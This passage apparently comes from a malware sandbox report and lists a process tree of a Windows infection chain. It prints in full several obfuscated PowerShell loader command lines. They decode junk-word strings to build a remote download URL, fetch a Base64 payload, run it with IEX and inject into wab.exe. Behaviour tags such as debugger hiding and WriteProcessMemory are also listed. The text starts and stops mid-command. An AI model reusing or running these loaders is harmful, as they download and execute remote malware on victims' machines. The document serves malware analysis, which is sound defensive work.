A,pagZwzrilKake.oBabesbSporoa ysfulVisit:Ste,hJA vena TaxonUrisan CyniePersokska eeAfsp.=SaiphNKarboeB ndmw,epil-RafalOFascib SkibjRetsleDebitcHypertUnbec BankkSCarboyB.slgs,lutrtDravieBispem Bar .Da stNPolypeMak,et etr. Ref.WAmputeCelanbL,tteCBloc,l Cha,iOutbaeDina nOe,ett');$Sexfilmenes+=$Tryptonize[1];Sigloi ($Sexfilmenes);Sigloi (Vikarieret 'Lysin$,sbesJFrsteaduchenBlnd,nNas.lethurikCommueHjreh.NordaHTredieSu.eraStraadopdyreD monrUi.odsProgr[Sobre$BibliLFiancgFlettt CurveCon ahUnm,saRatiomSh,rtm Skkee llimrReser]Grnse=Tigh,$Br.okVBiblia For rBenyti,caffaCha tnSolissPyrroaBokmanPap,raSkrldlKonveyJord s Ps,ueSammerHu ho2.ljte1Farte3 Edi ');$Irrigator=Vikarieret 'unmin$Van.hJt,ivlaKalkun afs,nAfstieCathokHypopeAssor.landeDOra,go,endiwTidsfn,rrobl Kad,oUntreaEncomdPe arFInteriEdderlKo,ple Inve( utte$FourbVPointi RakerRittekMi.jeeOpgav,Parce$ oatmT MonoiAnlidlStigmiBefrinRefratAp are Symbt istrgSociajblaatoRutebrTyp.fdRosebeUntors f.ad) tota ';$Tilintetgjordes=$Tryptonize[0];Sigloi (Vikarieret 'Forv.$restrgKabbelToldaose.usbSlagvaSt pplE.str:MedleSorlopo UndecridesilydigaRaadilSeedllQuizzeSkovldSemimeFo.flrsinitn Solue if dsSouff= Embo(Pr,egTa.droePneums Undet D,es-HydroP arotaNoventSynkrhChukk Forzi$ Pr.cT .estiOodlil huddiMispunAnaphtSpgeleMenintKu.legR.senjLa,stoUnseerAr otdMistne f.rhsAutot)Straf ');while (!$Socialledernes) {Sigloi (Vikarieret 'Taper$TheatgA rydlForm,oGermab.indfaPosi.lWoods:ThermVMidfir Tvrmi M sksDicoltFl,esrOver.e onpomLystm= rhve$AudretAnmrkr rgsvuWincheind a ') ;Sigloi $Irrigator;Sigloi (Vikarieret 'BroncSKresttd kehaPse,dr dec t.ubic-Me,ckSPunchl.ervieEnergeKorropBysta Aggl4Han,l ');Sigloi (Vikarieret 'Udsta$Miracg Un vlGnalloBorepbLeptoa ImpllProth:tat oSLovscoinflacFlbesi.uncha UnsalNonprlErhveeVegatdbo.eseHundrr Pa,enProgreBe.utsNeckl=Under( DeclT eglseF,stgsNoondtAv,we-DialoPOversa,loritOverfhharri Hjemf$GrundTSnd giNon.olCrabliFibronBruttt BloteMoonltMacedghightj.reatococcirExp,odDecenePeanss Equi)Ald h ') ;Sigloi (Vikarieret 'Bolig$D,mpsg DidelHas voTrossbNorthaPupillsupe,:sandbVLon,oaDisterLyngsi Creoa.ordln.amektnongieSinwartetra=Uneas$unbe,g Svanl.isseopetitbH,blea BomblDagpl:CortiN Unmao Assin OpstlIridieOdonttHom,zh KalaaLsevrl Regi+ ston+ Sil.%Emule$Eman Koss,ooCornenAnaptfHalteeS,mulkPugnat.atame,nforrForm nSun he.vdin.EditocKlageofo,svuInternEgot.tDistr ') ;$Virke=$Konfekterne[$Varianter];}$Sprngsikrestes=283038;$Samboens196=27914;Sigloi (Vikarieret 'Sa,gb$TylalgPro elFe eroJaziebCoalmaSuccel Dec :AccesMbodywoJdedosroma.lGradseGebyrmChiriiMixedcOdyli Agts=Hakke Ind kG ep.oeapho tU.rea- mi,rC FulfoPanhenImpe.tVal feStavenBallotSi.nn a.kit$.jlkeT Unv.iSpndilHjem i ThornSmi etGravmearchptWeemegUnprej AktioTve,irKommedSmaadeF,itusVisit ');Sigloi (Vikarieret 'Passa$An.etgNormalHanero.mprobFligaa andgldepen:Hi,siS Teapt.nintnE,ectkDogmasArbejkManchr Vel.mAtriue,colis.pand F.itu=Mesob depr[RuskeSUnsolySeel,sA,roltP,reneUnal,mUndsk.SpildCPselaoOveron po.iv St.ueelectr VirktVid r]Marke: N,gh:ConfiF G nnr A,rsoJ llbmDel.tBAnkomaUord sPro,ieLindy6C,kel4.fbinSKidsktqui,trJean,i,padenGa.logCamun( Hvi $UspilMSe vto,nterstransl PelleBrachmNoniniSeptecBrspa)Succo ');Sigloi (Vikarieret ' Lanc$GuldmgPlretlvaareo Shanb FlnsaCathalDisac:Ad.anEFeta,f Octat DysseReconrGavenbIntereVal,eh Fe,oaUmbonnhoracd,lectlAdoptiWillinGenuig.elsieGlasfnSever Caum= Even Secu[ InosSPe,spyUopfysunprotRebroe Ko.omM ota.E briT,uldbe Belix ,arctCow.e.ch raEGro snProgrcAttacoT kuldS.ovliTvangn u.ifgBlock]F.eld:Smmer:FilovAQuadrSPestiCBretaICont IRvesk. RingGNvnele.lgestKirniS Sc.ntSemilrTestiiWaternD sidgPr.pa(Halmk$ThoraSNontrtTwaddnKevlakUvsens D skkB,smurFoeltmGrad,eMankiskostb) Euph ');Sigloi (Vikarieret 'Bobni$BndslgA,vatlHjemlo Juv b egalaGlacilSknsk:uncatOHulver EvasdHalvteVa rkrForivlLuneriSmi tnMotheeEssoisPortrs Culme Undoscalva= R,pu$J.hnaEPljerfSta,ttBladeeDeclarSine b,ousseHaftahResdoaStormn.ossid ndenlTiti,iDekadnNeonagHun se Nedgnfrifu.Benb,sMonomuRingsbTeoresJnwait HeterIm,igiDeaconKuchegAerop(Se,pi$ UntrSSousapT lerrBernan RodigbutansGasm.i,ediokBygn rKutyme,isars .ellt LasieBambusH,bby,Ce.te$.tvniSReattaselvbmBunkrb SubtoO erdeDelflnJo,bes Weig1Recip9 Fila6Unspa)P nin ');Sigloi $Orderlinesses;"
10⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6532

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Profitratens.Sha && echo t"
11⤵
PID:4644

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Dynelftningens='Sub';$Dynelftningens+='strin';$Theca = 1;$Dynelftningens+='g';Function Vikarieret($Pinole){$Sitres=$Pinole.Length-$Theca;For($Spatiummernes=5;$Spatiummernes -lt $Sitres;$Spatiummernes+=6){$Uforskammethederne+=$Pinole.$Dynelftningens.Invoke( $Spatiummernes, $Theca);}$Uforskammethederne;}function Sigloi($Erhvervsarbejdets){& ($Fllesanlggenes) ($Erhvervsarbejdets);}$Variansanalyser213=Vikarieret 'UnconMHusleoReggazv,ttei Trkfl FjumlSvampaFortj/barqu5Ko,bi.Samme0arch, Kompa(Tr.mpWUn njiecttynDcbvadSamf.oTidsawReutesBygge N ndiNK,medTTran A.van1 pris0 T,gt.Nond 0Las e;.ovsc Acid,WS,ithiFrasenDem,p6Dialy4 Vind;Teg,i B,ghxErrit6 St.a4Detai;Septe Concr PhecvStuve:Trans1 ,raf2Snvle1M,red.Udkra0 Reps) blin BetryGBrsste.fprecHoersk Dicho Geze/Si,le2Nodos0Endli1Livmo0Fagkr0 Regn1Vi,is0Redef1Klsrh fal nFLatinimisfor Syske DyssfViolaoJimp.xBukse/ ore1Demon2 Bun,1 Inds.Cymt,0 ovse ';$Lgtehammer=Vikarieret 'Gam,lUNatursorkeseKontorhoved-Jo rnAB thygAsaheeMultinsextutUnabn ';$Virke=Vikarieret ' ngelhTilpatAnteptSpapepSm,lesHal,i:roeka/ En.a/Tir,ltUnpriaNoncat ,lons NonteAnmellH mrseSu,ercSkrivtFluatr I ioo I,son trapiTjurhcOneilsFormu. MasscGle.eo.nsha.,rikazHydrowFejlb/g.usssFootpd Uove/UnderGBodere tlasarbejt EoreaAgnifpTalleo errisSta.w..ivnicRg.jluT,emprOsteo ';$Delggers=Vikarieret 'tite.>P ilo ';$Fllesanlggenes=Vikarieret ' En,yiFor.re A laxKhir, ';$Macrogastria='Cowpunch';$Charas = Vikarieret 'JeteheYderlcTeaseh IntroMorti Spec%SlapsaBd,nipbidevpS.nildHemataMis at Angla ndd%,ills\Ja nePTer irNeuroo S pof PjaliAchrotquotirUdsmyaInfortUndeteUd.nsn ,gersSpong.SpytnSGenerh TopeaPucco ,pec&Ndsig&Unsel Fe teSer ecLaag,h Hypeo F,im SkydetTired ';Sigloi (Vikarieret 'Appas$SporogcankelW,lsooPe.sibSh.maa ufflWhimp:InvenTreinvrNeddyy ttecpH.rtit LenkoBantenRoseeiDemonz KlipeSkade= .etr(Kredscti lom TowndAmalg Vapou/Vgtafc,npar Subah$VolutCOu.fehA inea Ba nr ReklaEpidisDob e)Kledi ');Sigloi (Vikarieret 'Filag$KapregPollel Pe boHard.b StjeaGenopl utin:Up.liK GeoboOversn MonofBegreeMartyk Bowltshal e,ensdrdenisnS,rogeK.lde=nutcr$Afsp.VSpleniFightrRenumkAar.lePorph.afhrds.ovedpUpbinl T.buiLoxo.tTilsj(Fljka$NonpeDMilteeStan,lTho ggIndivg VinkeSisker Ethns In o)Danne ');$Virke=$Konfekterne[0];$Sexfilmenes= (Vikarieret 'T awl$ A,pagZwzrilKake.oBabesbSporoa ysfulVisit:Ste,hJA vena TaxonUrisan CyniePersokska eeAfsp.=SaiphNKarboeB ndmw,epil-RafalOFascib SkibjRetsleDebitcHypertUnbec BankkSCarboyB.slgs,lutrtDravieBispem Bar .Da stNPolypeMak,et etr. Ref.WAmputeCelanbL,tteCBloc,l Cha,iOutbaeDina nOe,ett');$Sexfilmenes+=$Tryptonize[1];Sigloi ($Sexfilmenes);Sigloi (Vikarieret 'Lysin$,sbesJFrsteaduchenBlnd,nNas.lethurikCommueHjreh.NordaHTredieSu.eraStraadopdyreD monrUi.odsProgr[Sobre$BibliLFiancgFlettt CurveCon ahUnm,saRatiomSh,rtm Skkee llimrReser]Grnse=Tigh,$Br.okVBiblia For rBenyti,caffaCha tnSolissPyrroaBokmanPap,raSkrldlKonveyJord s Ps,ueSammerHu ho2.ljte1Farte3 Edi ');$Irrigator=Vikarieret 'unmin$Van.hJt,ivlaKalkun afs,nAfstieCathokHypopeAssor.landeDOra,go,endiwTidsfn,rrobl Kad,oUntreaEncomdPe arFInteriEdderlKo,ple Inve( utte$FourbVPointi RakerRittekMi.jeeOpgav,Parce$ oatmT MonoiAnlidlStigmiBefrinRefratAp are Symbt istrgSociajblaatoRutebrTyp.fdRosebeUntors f.ad) tota ';$Tilintetgjordes=$Tryptonize[0];Sigloi (Vikarieret 'Forv.$restrgKabbelToldaose.usbSlagvaSt pplE.str:MedleSorlopo UndecridesilydigaRaadilSeedllQuizzeSkovldSemimeFo.flrsinitn Solue if dsSouff= Embo(Pr,egTa.droePneums Undet D,es-HydroP arotaNoventSynkrhChukk Forzi$ Pr.cT .estiOodlil huddiMispunAnaphtSpgeleMenintKu.legR.senjLa,stoUnseerAr otdMistne f.rhsAutot)Straf ');while (!$Socialledernes) {Sigloi (Vikarieret 'Taper$TheatgA rydlForm,oGermab.indfaPosi.lWoods:ThermVMidfir Tvrmi M sksDicoltFl,esrOver.e onpomLystm= rhve$AudretAnmrkr rgsvuWincheind a ') ;Sigloi $Irrigator;Sigloi (Vikarieret 'BroncSKresttd kehaPse,dr dec t.ubic-Me,ckSPunchl.ervieEnergeKorropBysta Aggl4Han,l ');Sigloi (Vikarieret 'Udsta$Miracg Un vlGnalloBorepbLeptoa ImpllProth:tat oSLovscoinflacFlbesi.uncha UnsalNonprlErhveeVegatdbo.eseHundrr Pa,enProgreBe.utsNeckl=Under( DeclT eglseF,stgsNoondtAv,we-DialoPOversa,loritOverfhharri Hjemf$GrundTSnd giNon.olCrabliFibronBruttt BloteMoonltMacedghightj.reatococcirExp,odDecenePeanss Equi)Ald h ') ;Sigloi (Vikarieret 'Bolig$D,mpsg DidelHas voTrossbNorthaPupillsupe,:sandbVLon,oaDisterLyngsi Creoa.ordln.amektnongieSinwartetra=Uneas$unbe,g Svanl.isseopetitbH,blea BomblDagpl:CortiN Unmao Assin OpstlIridieOdonttHom,zh KalaaLsevrl Regi+ ston+ Sil.%Emule$Eman Koss,ooCornenAnaptfHalteeS,mulkPugnat.atame,nforrForm nSun he.vdin.EditocKlageofo,svuInternEgot.tDistr ') ;$Virke=$Konfekterne[$Varianter];}$Sprngsikrestes=283038;$Samboens196=27914;Sigloi (Vikarieret 'Sa,gb$TylalgPro elFe eroJaziebCoalmaSuccel Dec :AccesMbodywoJdedosroma.lGradseGebyrmChiriiMixedcOdyli Agts=Hakke Ind kG ep.oeapho tU.rea- mi,rC FulfoPanhenImpe.tVal feStavenBallotSi.nn a.kit$.jlkeT Unv.iSpndilHjem i ThornSmi etGravmearchptWeemegUnprej AktioTve,irKommedSmaadeF,itusVisit ');Sigloi (Vikarieret 'Passa$An.etgNormalHanero.mprobFligaa andgldepen:Hi,siS Teapt.nintnE,ectkDogmasArbejkManchr Vel.mAtriue,colis.pand F.itu=Mesob depr[RuskeSUnsolySeel,sA,roltP,reneUnal,mUndsk.SpildCPselaoOveron po.iv St.ueelectr VirktVid r]Marke: N,gh:ConfiF G nnr A,rsoJ llbmDel.tBAnkomaUord sPro,ieLindy6C,kel4.fbinSKidsktqui,trJean,i,padenGa.logCamun( Hvi $UspilMSe vto,nterstransl PelleBrachmNoniniSeptecBrspa)Succo ');Sigloi (Vikarieret ' Lanc$GuldmgPlretlvaareo Shanb FlnsaCathalDisac:Ad.anEFeta,f Octat DysseReconrGavenbIntereVal,eh Fe,oaUmbonnhoracd,lectlAdoptiWillinGenuig.elsieGlasfnSever Caum= Even Secu[ InosSPe,spyUopfysunprotRebroe Ko.omM ota.E briT,uldbe Belix ,arctCow.e.ch raEGro snProgrcAttacoT kuldS.ovliTvangn u.ifgBlock]F.eld:Smmer:FilovAQuadrSPestiCBretaICont IRvesk. RingGNvnele.lgestKirniS Sc.ntSemilrTestiiWaternD sidgPr.pa(Halmk$ThoraSNontrtTwaddnKevlakUvsens D skkB,smurFoeltmGrad,eMankiskostb) Euph ');Sigloi (Vikarieret 'Bobni$BndslgA,vatlHjemlo Juv b egalaGlacilSknsk:uncatOHulver EvasdHalvteVa rkrForivlLuneriSmi tnMotheeEssoisPortrs Culme Undoscalva= R,pu$J.hnaEPljerfSta,ttBladeeDeclarSine b,ousseHaftahResdoaStormn.ossid ndenlTiti,iDekadnNeonagHun se Nedgnfrifu.Benb,sMonomuRingsbTeoresJnwait HeterIm,igiDeaconKuchegAerop(Se,pi$ UntrSSousapT lerrBernan RodigbutansGasm.i,ediokBygn rKutyme,isars .ellt LasieBambusH,bby,Ce.te$.tvniSReattaselvbmBunkrb SubtoO erdeDelflnJo,bes Weig1Recip9 Fila6Unspa)P nin ');Sigloi $Orderlinesses;"
11⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:3308

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Profitratens.Sha && echo t"
12⤵
PID:3344

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
12⤵
- Modifies system executable filetype association
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
PID:4392

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vjrogx.vbe"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:220

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Sawneb='Sub';$Sawneb+='strin';$Delfinarium97 = 1;$Sawneb+='g';Function nosologies($Presignify){$Elvrksarbejdere=$Presignify.Length-$Delfinarium97;For($Ludbehandlendes=5;$Ludbehandlendes -lt $Elvrksarbejdere;$Ludbehandlendes+=6){$Kombifilter+=$Presignify.$Sawneb.Invoke( $Ludbehandlendes, $Delfinarium97);}$Kombifilter;}function Lrerkollegierne($Pingvinernes){. ($Nabosprog) ($Pingvinernes);}$Autotelic105=nosologies ' PseuMPalomostvnizJehjdiDysphl TofalRegneaDisp,/Perip5Lysso.Ran.a0Subu. Drill(UdlejWNajeriFrokonPrkend Phleo ommuwStyllsParkg gn toNL.ditT Lava Casa1forfr0 Urre.Unlac0glend;Gloss EpsilWpig.biFormknApiol6Sakka4,ntro;Adorn UstabxEstim6Antir4S.orh; Gums GenbrrTransv Net.:Twop 1 Psa,2Lands1Virks.Beb.e0Nonex) Adol AcquiGDepope ou.pcReorik UvejoTjrin/Moral2Blast0Overf1Bogen0ha,mo0.rsal1,teuc0Skraa1Subci skravFNidiniCar.arNdrineEnamsfMelanoNordexSe ti/Zygad1Hydro2 B un1 Bej,.B.der0 Apht ';$uninoculable=nosologies 'JoyceU Sk fsWas,ieSkindrWodge-AntheApostpgEle teQuavinSejt,tPer,t ';$kammermusikken=nosologies ' SpechSammetLivestMaarep CarisFjerk: Acar/Aer,g/unifot KoncaskabetTrontspaafueNorthl Ta.feEntrec ncurt.anutrTransorin,onInstai InkocOu,susBaade. ncoucKongeoUnbur.ContizO,tflwTabul/Br,basStavndRegel/Un,erTVelr r Speco SerpmSpeaklUnreteAnginrMilhaeAandlv ImmeoSdc.llSubprvCoxaleSocierNondeeH,lmlsViole.HundrctelessBa.ebvManu ';$Roomette=nosologies 'U der>Sakk. ';$Nabosprog=nosologies 'In,ohi PorpePleurx Cess ';$Fldebollernes='osteomatoid';$Forborne = nosologies 'PerosePlanlcNoctih .namotorn, M.us%MilieaFortrp ourbpArmozdSammea VagttBor.tama,eg%Tilpl\FondsIHovednSucc,dununit MoneaEastes.useutApiosnPrferiAekvinFarc,gsvinge VivirGe.tunWateres ripsHersk.a tioV De.aoDivisiS.xmi Retra& Tave& wolf Landse Disccrungeh k rmo,enop SarditNoedv ';Lrerkollegierne (nosologies 'Overh$SoldagSt,ealNiggloAc.rebSits aVesi.lmonot:PygalCArealiCorrit,okolrCel.doErstan B rtmTilpleImmanlFondeiAnmrksAdiposChakoe F llnCongr=Koers(.lkalcMyttemOpfredTre t Teleg/ UngkcN nas Pr.re$UnderFE.plioAkt orTyrosb .isuoPlanlrHete.nUdueleA.oli)Sters ');Lrerkollegierne (nosologies 'galge$H lhegTriadlKee,aoS.bmab Su eaJenlgl Pure:Stvs,F DolkiSn,reg Pe,pu Antir litulTrofuiIn stgSpro,tFulds=Kaffe$UnthrkVversaM.kromMuddemSi,kee RumfrOpbevmBevbnuSameksFdep.i.erkokCymrik KataeTransnm,tal.,edgisPhotopForkylPhariibrynjtIndse(ammon$ InddRBou,co Overo Sp,lm E.ineU.iastAlt,rtPhonoe hund)Proce ');$kammermusikken=$Figurligt[0];$Billedhugger= (nosologies 'Espen$Troubg rtygl fvejoEff cb CabuaTrofflLacte:IndvaB OutsaSnvler PreaiPr.colD ivalOve.paBrndp=BretwN omlseBenedw.arak- .tarOBra.nb tancjHoodle Boatc Un etStuds rupSTaaley Eks s TonattowereSprinm D ff.M.nelN Tinge S.iltTilsp. GesaWUdlaaeMa hibB.rupCLejlillageriLeveleMinernAss rt');$Billedhugger+=$Citronmelissen[1];Lrerkollegierne ($Billedhugger);Lrerkollegierne (nosologies 'Skr,t$CuriuB FlipaPanderBubaliCavialKo belBlussa,itho.StrneHP,ecueStu,eathorod.verpeFe.ltr.aleosblens[Inter$Cyke,uKnibtnStdtviGn,tonMaralo.accac GriluHenr.l Lo.aa xsebs vbol bsceeChan,]K.nfe=Serra$Bo,siARe,rguOverstPsychoBagflt HampeAdminlbudgeiI,ealcGate,1Cup.e0Havar5 Enta ');$Gentlemanliness=nosologies ' Spor$AuricBSold,a G,ckrS oroiLachrlCitatlInteraFrem,. ErhvDModeroSkaktwS.lfonDouchlLol hoKelpsaEpiled n,nlF popkiMarmolUnmumeAntim(Disin$Tipsfk ,neqaWavenmUbeskmDyreheSv,gerTroldmBetalu ukas b,roi DrookA komk,ordoeErstan,onre,Grund$Myr hRSku de ,staeShabbcGuarnhImporoTro s)Dolkt ';$Reecho=$Citronmelissen[0];Lrerkollegierne (nosologies ' Uden$G,stugFodrilStadsoForsybAfst,aDrosllCapuc:UnsubNTurnoycensubPrecorImmatu Redod KarldVoldeeOcclunSysteeDeuto1L,ach3 Morp2Pheny= D kk( FaasTHoroseCaceisMiasmt ppro- eellPFanmaaCionitStillhAmano uram $FikssRArthreBybuselysvacHete,hEuro,o.efra) Ende ');while (!$Nybruddene132) {Lrerkollegierne (nosologies 'Nvenp$Miilig,ostslRu.eio Uns bIndmaa P.ptlPr.ve:OutbrWhydr,e SerisBrutts Tur eImparlAnden=Nonse$Aftegt FluerGn llu biaueS,rve ') ;Lrerkollegierne $Gentlemanliness;Lrerkollegierne (nosologies 'SkovbSSemimtForpaaPosserAp,mitTuber-DemagSStegolOveroeHetereMelonpNrved mai.f4Notat ');Lrerkollegierne (nosologies 'Misba$Emb lg nlilVelf oTr.vrbKonfeaAyahalWorsh:NonsuNMaskiyTarifbtrapprS nituEpicodHukkedBarnae LandnChroneMo.or1 P nk3 pock2 Lata=genn ( trilTFlosneSekr sFremvtAte o-SlrinPDossyaA.teetRegiohGa.eo A tio$ Sa,iRLach,eS ileeMisapcGomuthSociooEst,b)Bo,tl ') ;Lrerkollegierne (nosologies 'Depor$D mingBa dul PereoEksp,bTeknoa Menol Ekse:divinAK.ndikFolket SkuliRenseeBrn,taMangfvo,tthaRe,ivnOblonc QuineSniver UnadnTapeteUngli=Absol$ eazgSoloslForsvoVis.abMikkiaPredolElmie:AphesI rdgrnMikelv,ssoci BlactBroddeLaina+Febru+ ,erl% Opla$OrdreFtilbyiM.ltigHandeuPrecorversalB.arbiSp,ydgBaventHe.al. Skruc.manuoCoosiuRefu nEtiketC mot ') ;$kammermusikken=$Figurligt[$Aktieavancerne];}$unembowered=292446;$Nonprosperously=29824;Lrerkollegierne (nosologies ' ,ilj$Antiig N nmlSpanco urtib.rvyeaIndtelFrute: ToxiDZerotiHy.rof T.aitBenmeoRifisnUnt egFortheLitzir K ureOrdre ,kuau=Dry,t conciG Unsue osehtEn.ou-CatecCKalveoiso onAnsart StaveaxtrenFlumatbimas ribo$VrktjRRealkeUnf.meFlidec EksthAmlonoSpi.e ');Lrerkollegierne (nosologies ' Ste.$Ly,regAdmitl Chaso WaulbMyeloa.eroslSjals:C,rcuB,rdeieS aresDrfyliLoesngSprydtHenaaiWelshgPaadmePanthlSyntosLirate Nrahn Bhag Trekv=Klode Skues[ CoccSCarpoyS,onss crimtAmalgeFreebmCurso.PhotoCPrio oFrisrnVandkvStrane K itr UnwrtEldor]S ile: O.ci:SuperFstykerLydbgoSmalnmRe.raBNachgaTynd s,uleeeKa.ed6lus e4SemidSPe get anc,r TheriNewfonFilifgRaadh(Pa an$RecarDMicroiAf,oefSystetAfsteoDiplon ForbgMinareI.perrBeatgeVelve)Asbes ');Lrerkollegierne (nosologies 'Snigm$AfvangLute.lCrayoo .verb MuleaG amolBar.e:Lyse.CSco,ehVipsteBroenmDusiniRapa lTraceurappem SalgiBrevsnNonaueFry.ssForurc EngreD quen heetUnwar Reseq=Lapp Incit[ StedSBlodpyPrimesPle,etSyllaeRamarmAutom.cor eTMoraleAc.uaxNo cotA.jud.PurliECel,in tabec .ormo tru.ddeteriHindrn velsgUnton]Velig:Zelin:Rast,AExpatS BetoCDacr ITackiIBrnek. RecoG F lseAlloct asteS PlagtMilitrMerkaiJernanWeedlg Ove.( Eval$EnlayBLandoeParafs Volci HjemgWit.ot SteliS.inggrenteeUhenslStudisF,mbreNoternBesyn)Vascu ');Lrerkollegierne (nosologies 'arrak$ YellgStonelBrainovr,epb DanmaSto el Klip: K.ltSCalcatUige.aW oretVinkooJensps tr,cpThorno BromrTon.ae .vad=Waste$,iannCSkrmth,onsueryghvmIndskiThalalbryggu ompumThuriiTrietn LongeIndflsprestc,lmaheHermenMusdot Bahr.frugtsHypoauDeflab ChapsInfortApicir Hus,idispinOrddegParab(Efte.$ SpiruUnbefnDiscre HypemConsib.andloNonpawDampnef,rmar,ithyeKommedUford, siem$piperNForm oAfp,vnBuc,fpThonfr WintogrievsPopulp ElfleUndusrForldo CanouPsykos sen lInddayUdskr)Regas ');Lrerkollegierne $Statospore;"
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4576

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indtastningernes.Voi && echo t"
7⤵
PID:2124

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Sawneb='Sub';$Sawneb+='strin';$Delfinarium97 = 1;$Sawneb+='g';Function nosologies($Presignify){$Elvrksarbejdere=$Presignify.Length-$Delfinarium97;For($Ludbehandlendes=5;$Ludbehandlendes -lt $Elvrksarbejdere;$Ludbehandlendes+=6){$Kombifilter+=$Presignify.$Sawneb.Invoke( $Ludbehandlendes, $Delfinarium97);}$Kombifilter;}function Lrerkollegierne($Pingvinernes){. ($Nabosprog) ($Pingvinernes);}$Autotelic105=nosologies ' PseuMPalomostvnizJehjdiDysphl TofalRegneaDisp,/Perip5Lysso.Ran.a0Subu. Drill(UdlejWNajeriFrokonPrkend Phleo ommuwStyllsParkg gn toNL.ditT Lava Casa1forfr0 Urre.Unlac0glend;Gloss EpsilWpig.biFormknApiol6Sakka4,ntro;Adorn UstabxEstim6Antir4S.orh; Gums GenbrrTransv Net.:Twop 1 Psa,2Lands1Virks.Beb.e0Nonex) Adol AcquiGDepope ou.pcReorik UvejoTjrin/Moral2Blast0Overf1Bogen0ha,mo0.rsal1,teuc0Skraa1Subci skravFNidiniCar.arNdrineEnamsfMelanoNordexSe ti/Zygad1Hydro2 B un1 Bej,.B.der0 Apht ';$uninoculable=nosologies 'JoyceU Sk fsWas,ieSkindrWodge-AntheApostpgEle teQuavinSejt,tPer,t ';$kammermusikken=nosologies ' SpechSammetLivestMaarep CarisFjerk: Acar/Aer,g/unifot KoncaskabetTrontspaafueNorthl Ta.feEntrec ncurt.anutrTransorin,onInstai InkocOu,susBaade. ncoucKongeoUnbur.ContizO,tflwTabul/Br,basStavndRegel/Un,erTVelr r Speco SerpmSpeaklUnreteAnginrMilhaeAandlv ImmeoSdc.llSubprvCoxaleSocierNondeeH,lmlsViole.HundrctelessBa.ebvManu ';$Roomette=nosologies 'U der>Sakk. ';$Nabosprog=nosologies 'In,ohi PorpePleurx Cess ';$Fldebollernes='osteomatoid';$Forborne = nosologies 'PerosePlanlcNoctih .namotorn, M.us%MilieaFortrp ourbpArmozdSammea VagttBor.tama,eg%Tilpl\FondsIHovednSucc,dununit MoneaEastes.useutApiosnPrferiAekvinFarc,gsvinge VivirGe.tunWateres ripsHersk.a tioV De.aoDivisiS.xmi Retra& Tave& wolf Landse Disccrungeh k rmo,enop SarditNoedv ';Lrerkollegierne (nosologies 'Overh$SoldagSt,ealNiggloAc.rebSits aVesi.lmonot:PygalCArealiCorrit,okolrCel.doErstan B rtmTilpleImmanlFondeiAnmrksAdiposChakoe F llnCongr=Koers(.lkalcMyttemOpfredTre t Teleg/ UngkcN nas Pr.re$UnderFE.plioAkt orTyrosb .isuoPlanlrHete.nUdueleA.oli)Sters ');Lrerkollegierne (nosologies 'galge$H lhegTriadlKee,aoS.bmab Su eaJenlgl Pure:Stvs,F DolkiSn,reg Pe,pu Antir litulTrofuiIn stgSpro,tFulds=Kaffe$UnthrkVversaM.kromMuddemSi,kee RumfrOpbevmBevbnuSameksFdep.i.erkokCymrik KataeTransnm,tal.,edgisPhotopForkylPhariibrynjtIndse(ammon$ InddRBou,co Overo Sp,lm E.ineU.iastAlt,rtPhonoe hund)Proce ');$kammermusikken=$Figurligt[0];$Billedhugger= (nosologies 'Espen$Troubg rtygl fvejoEff cb CabuaTrofflLacte:IndvaB OutsaSnvler PreaiPr.colD ivalOve.paBrndp=BretwN omlseBenedw.arak- .tarOBra.nb tancjHoodle Boatc Un etStuds rupSTaaley Eks s TonattowereSprinm D ff.M.nelN Tinge S.iltTilsp. GesaWUdlaaeMa hibB.rupCLejlillageriLeveleMinernAss rt');$Billedhugger+=$Citronmelissen[1];Lrerkollegierne ($Billedhugger);Lrerkollegierne (nosologies 'Skr,t$CuriuB FlipaPanderBubaliCavialKo belBlussa,itho.StrneHP,ecueStu,eathorod.verpeFe.ltr.aleosblens[Inter$Cyke,uKnibtnStdtviGn,tonMaralo.accac GriluHenr.l Lo.aa xsebs vbol bsceeChan,]K.nfe=Serra$Bo,siARe,rguOverstPsychoBagflt HampeAdminlbudgeiI,ealcGate,1Cup.e0Havar5 Enta ');$Gentlemanliness=nosologies ' Spor$AuricBSold,a G,ckrS oroiLachrlCitatlInteraFrem,. ErhvDModeroSkaktwS.lfonDouchlLol hoKelpsaEpiled n,nlF popkiMarmolUnmumeAntim(Disin$Tipsfk ,neqaWavenmUbeskmDyreheSv,gerTroldmBetalu ukas b,roi DrookA komk,ordoeErstan,onre,Grund$Myr hRSku de ,staeShabbcGuarnhImporoTro s)Dolkt ';$Reecho=$Citronmelissen[0];Lrerkollegierne (nosologies ' Uden$G,stugFodrilStadsoForsybAfst,aDrosllCapuc:UnsubNTurnoycensubPrecorImmatu Redod KarldVoldeeOcclunSysteeDeuto1L,ach3 Morp2Pheny= D kk( FaasTHoroseCaceisMiasmt ppro- eellPFanmaaCionitStillhAmano uram $FikssRArthreBybuselysvacHete,hEuro,o.efra) Ende ');while (!$Nybruddene132) 